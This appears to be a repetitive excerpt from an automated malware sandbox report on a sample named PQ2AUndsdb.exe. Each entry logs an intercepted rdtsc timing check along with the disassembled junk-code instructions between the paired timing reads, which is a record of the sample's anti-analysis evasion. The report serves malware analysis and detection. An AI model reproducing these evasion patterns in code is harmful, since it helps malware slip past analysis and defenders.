Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E568E0 second address: E568E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E568E4 second address: E56941 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pop eax 0x00000008 add ch, FFFFFF83h 0x0000000b call 00007FA0AD455109h 0x00000010 jo 00007FA0AD455112h 0x00000016 jno 00007FA0AD45510Ch 0x0000001c push eax 0x0000001d pushad 0x0000001e jnc 00007FA0AD45510Ch 0x00000024 jmp 00007FA0AD45510Dh 0x00000029 popad 0x0000002a mov eax, dword ptr [esp+04h] 0x0000002e jp 00007FA0AD455110h 0x00000034 mov eax, dword ptr [eax] 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push ebx 0x0000003a pop ebx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E56A34 second address: E56A43 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA0AD4759D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E56B0B second address: E56B0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E57432 second address: E344F2 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA0AD4759D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007FA0AD4759D8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000014h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 mov ecx, dword ptr [ebp+122D356Ah] 0x0000002e lea eax, dword ptr [ebp+1248AFE6h] 0x00000034 push ebx 0x00000035 add dword ptr [ebp+122D2A14h], ecx 0x0000003b pop edx 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f jmp 00007FA0AD4759E2h 0x00000044 pushad 0x00000045 popad 0x00000046 popad 0x00000047 pushad 0x00000048 jbe 00007FA0AD4759D6h 0x0000004e pushad 0x0000004f popad 0x00000050 popad 0x00000051 popad 0x00000052 mov dword ptr [esp], eax 0x00000055 mov dx, 35CDh 0x00000059 and cx, 6C7Fh 0x0000005e call dword ptr [ebp+122D29A1h] 0x00000064 pushad 0x00000065 pushad 0x00000066 ja 00007FA0AD4759D6h 0x0000006c push eax 0x0000006d push edx 0x0000006e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E344F2 second address: E344FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E344FB second address: E34510 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E34510 second address: E3452B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD455117h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E3452B second address: E3454E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jno 00007FA0AD4759D6h 0x0000000e jmp 00007FA0AD4759E5h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E3454E second address: E3455C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD45510Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E9180B second address: E9182A instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA0AD4759D6h 0x00000008 jno 00007FA0AD4759D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push esi 0x00000011 jmp 00007FA0AD4759DCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E91DE2 second address: E91DEC instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA0AD455124h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E97F3D second address: E97F41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E96D98 second address: E96DB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD455114h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E96F0C second address: E96F12 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E970AC second address: E970C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD455113h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E970C5 second address: E970D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E970D9 second address: E970DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E97391 second address: E97395 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E97395 second address: E973D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD455118h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c push edi 0x0000000d jp 00007FA0AD45511Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 jo 00007FA0AD455106h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E97DD4 second address: E97DDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E96681 second address: E966A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA0AD455106h 0x0000000a popad 0x0000000b popad 0x0000000c jnp 00007FA0AD45511Eh 0x00000012 pushad 0x00000013 jl 00007FA0AD455106h 0x00000019 jno 00007FA0AD455106h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E9A29B second address: E9A29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E9A29F second address: E9A2A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E9A2A3 second address: E9A2BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA0AD4759E2h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E9A2BB second address: E9A2D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA0AD455113h 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E9A2D4 second address: E9A2D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E9A2D8 second address: E9A2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E9A2DE second address: E9A30C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnl 00007FA0AD4759D6h 0x00000011 jmp 00007FA0AD4759E1h 0x00000016 popad 0x00000017 jmp 00007FA0AD4759DBh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E9D5DC second address: E9D5E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E9D5E5 second address: E9D5EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E9D5EA second address: E9D5F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E9D1C1 second address: E9D1CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FA0AD4759D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA3FD7 second address: EA3FDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA3FDB second address: EA3FDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA3FDF second address: EA3FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD45510Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA3FF0 second address: EA4010 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759E6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA4010 second address: EA402B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD455117h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA402B second address: EA4056 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA0AD4759D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FA0AD4759F1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA4056 second address: EA4062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jg 00007FA0AD455106h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA2D26 second address: EA2D2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA2D2A second address: EA2D30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA3022 second address: EA303F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 jo 00007FA0AD4759D6h 0x0000000c jmp 00007FA0AD4759DFh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E56EAD second address: E56EB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA31CE second address: EA31E3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA0AD4759D6h 0x00000008 jmp 00007FA0AD4759DBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA31E3 second address: EA31E8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA7355 second address: EA7359 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA7359 second address: EA7394 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007FA0AD45512Ah 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f ja 00007FA0AD45510Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA7394 second address: EA7398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA7398 second address: EA73A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA0AD455106h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA74C2 second address: EA74C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA74C8 second address: EA74DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA0AD455106h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FA0AD455106h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA74DD second address: EA74F8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA74F8 second address: EA74FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA74FE second address: EA7502 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA7502 second address: EA7516 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD45510Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA7516 second address: EA7557 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push esi 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c jnp 00007FA0AD4759E2h 0x00000012 ja 00007FA0AD4759D6h 0x00000018 js 00007FA0AD4759D6h 0x0000001e push ebx 0x0000001f jmp 00007FA0AD4759DAh 0x00000024 pop ebx 0x00000025 push ebx 0x00000026 jmp 00007FA0AD4759E4h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA76D8 second address: EA76E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FA0AD455106h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA7C3F second address: EA7C4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 js 00007FA0AD4759EFh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA7C4E second address: EA7C65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD455113h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA7C65 second address: EA7C6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA7C6D second address: EA7C71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA7C71 second address: EA7C8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push edi 0x00000010 jnc 00007FA0AD4759D6h 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EA7C8C second address: EA7C90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: E09F73 second address: E09F77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB152C second address: EB153A instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA0AD455106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB153A second address: EB1540 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB1540 second address: EB154C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007FA0AD455106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB1873 second address: EB188D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007FA0AD4759D6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB1DE6 second address: EB1DEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB1DEB second address: EB1E0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD4759E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ecx 0x0000000e jng 00007FA0AD4759DEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB1E0F second address: EB1E29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 jmp 00007FA0AD455111h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB20CD second address: EB20D3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB20D3 second address: EB20D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB20D7 second address: EB20E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB20E0 second address: EB20E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB20E6 second address: EB2105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jp 00007FA0AD475A00h 0x0000000f pushad 0x00000010 jmp 00007FA0AD4759DDh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB2105 second address: EB211A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA0AD45510Bh 0x0000000b popad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB26C8 second address: EB26D8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA0AD4759D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB2F37 second address: EB2F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD455118h 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB2F57 second address: EB2F5D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB6DB1 second address: EB6DC3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA0AD45510Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB6DC3 second address: EB6DC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB6F4B second address: EB6F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB6F51 second address: EB6F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB6F57 second address: EB6F5C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB6F5C second address: EB6F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA0AD4759DFh 0x00000009 jnc 00007FA0AD4759D6h 0x0000000f jng 00007FA0AD4759D6h 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push edx 0x0000001a pop edx 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 jmp 00007FA0AD4759E2h 0x00000026 pushad 0x00000027 popad 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB7120 second address: EB7127 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB73FB second address: EB7405 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FA0AD4759D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB7405 second address: EB740B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PQ2AUndsdb.exe	RDTSC instruction interceptor: First address: EB740B second address: EB7415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA0AD4759D6h 0x0000000a rdtsc
